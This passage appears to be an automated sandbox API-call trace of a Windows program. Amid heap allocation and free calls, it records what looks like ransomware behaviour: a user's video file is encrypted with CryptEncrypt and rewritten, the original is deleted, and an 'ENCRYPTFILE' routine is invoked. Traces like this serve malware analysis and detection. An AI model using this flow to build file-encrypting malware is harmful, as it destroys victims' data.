hHeap=0x1780000) returned 1 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0102.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0102.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0102.584] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0102.584] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0102.585] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0102.585] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0102.585] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0102.586] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0102.587] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.587] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0102.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0102.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.588] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0102.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.637] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0102.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0102.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0102.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0102.638] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0102.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0102.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0102.638] CryptGetKeyParam (in: hKey=0x41ac040, dwParam=0x7, pbData=0x43e2930, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2930*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0102.638] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0102.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.638] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0102.638] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0102.639] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x5fd0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x5fe0) returned 1 [0102.639] CharLowerBuffW (in: lpsz="byte[24545]", cchLength=0xb | out: lpsz="byte[24545]") returned 0xb [0102.639] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.639] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0102.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caee0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0102.639] CryptEncrypt (in: hKey=0x41ac040, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4527f98*, pdwDataLen=0x144e088*=0x5fd0, dwBufLen=0x5fe0 | out: pbData=0x4527f98*, pdwDataLen=0x144e088*=0x5fe0) returned 1 [0102.639] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0102.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0102.639] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.639] WriteFile (in: hFile=0x298, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x5fe0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0x5fe0, lpOverlapped=0x0) returned 1 [0102.641] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0102.641] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.641] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cab80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0102.641] CryptDestroyKey (hKey=0x41ac040) returned 1 [0102.641] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0102.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0102.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.641] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0102.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0102.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.642] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0102.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0102.642] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0102.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.642] FreeLibrary (hLibModule=0x756e0000) returned 1 [0102.642] CloseHandle (hObject=0x258) returned 1 [0102.642] CloseHandle (hObject=0x298) returned 1 [0102.656] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\s4MXeg0Vr.avi", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\s4MXeg0Vr.avi", lpFilePart=0x0) returned 0x4f [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0102.656] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\s4MXeg0Vr.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\s4mxeg0vr.avi")) returned 0x20 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a79b0 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0102.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0102.657] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\s4MXeg0Vr.avi", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55e2cc60, ftCreationTime.dwHighDateTime=0x1d5e114, ftLastAccessTime.dwLowDateTime=0x5ea9f620, ftLastAccessTime.dwHighDateTime=0x1d5e493, ftLastWriteTime.dwLowDateTime=0x5ea9f620, ftLastWriteTime.dwHighDateTime=0x1d5e493, nFileSizeHigh=0x0, nFileSizeLow=0x5fd0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="s4MXeg0Vr.avi", cAlternateFileName="S4MXEG~1.AVI")) returned 0x41ac540 [0102.657] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\s4MXeg0Vr.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\s4mxeg0vr.avi")) returned 1 [0102.705] FindNextFileW (in: hFindFile=0x41ac540, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55e2cc60, ftCreationTime.dwHighDateTime=0x1d5e114, ftLastAccessTime.dwLowDateTime=0x5ea9f620, ftLastAccessTime.dwHighDateTime=0x1d5e493, ftLastWriteTime.dwLowDateTime=0x5ea9f620, ftLastWriteTime.dwHighDateTime=0x1d5e493, nFileSizeHigh=0x0, nFileSizeLow=0x5fd0, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="s4MXeg0Vr.avi", cAlternateFileName="S4MXEG~1.AVI")) returned 0 [0102.705] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0102.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0102.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a84d8 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0102.706] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0102.706] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cccb0 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0102.706] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0102.706] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0102.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0102.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0102.706] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0102.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0102.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2740 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0102.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0102.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0102.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x140) returned 0x43cccb0 [0102.707] HeapFree 